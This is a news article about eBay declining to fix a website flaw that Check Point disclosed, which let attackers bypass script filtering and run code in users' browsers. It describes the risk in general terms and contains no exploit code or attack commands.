eBay refuses to patch website flaw that can serve up malware

The e-commerce giant confirmed it would not fix the flaw, which could allow an attacker to remotely run code in a user's browser.
Written by Zack Whittaker, Contributor
(Image: CNET/CBS Interactive)

eBay will not fix a flaw in its website that could allow an attacker to serve malware to unsuspecting site users.

Israeli security firm and firewall maker Check Point disclosed a "severe" vulnerability that would allow an attacker to bypass eBay's code validation and remotely executive malicious code on the e-commerce site's users.

Because of the nature of the vulnerability, an attacker can execute remote code that steals local data, injects code into unencrypted sites that could trick a user into turning over usernames and passwords, or even initiate malware or ransomware downloads.

An attacker would have to use non-standard programming code to embed malicious content on their own online store, because the platform prevents scripts and IFRAMES (which can host third-party site content) from loading. Check Point researchers were able to bypass some of these script-preventing measures by using just six different characters.

After Check Point privately reported the vulnerability on December 15, eBay said a month later that it has no plans to fix the flaw.

eBay, which serves more than 162 million across 30 countries based on its fiscal fourth-quarter earnings, said that it has "not found any fraudulent activity stemming from this incident."

The spokesperson added that "while not fully patched," the e-commerce giant has "implemented various security filters based on his findings," but did not provide additional details.

Editorial standards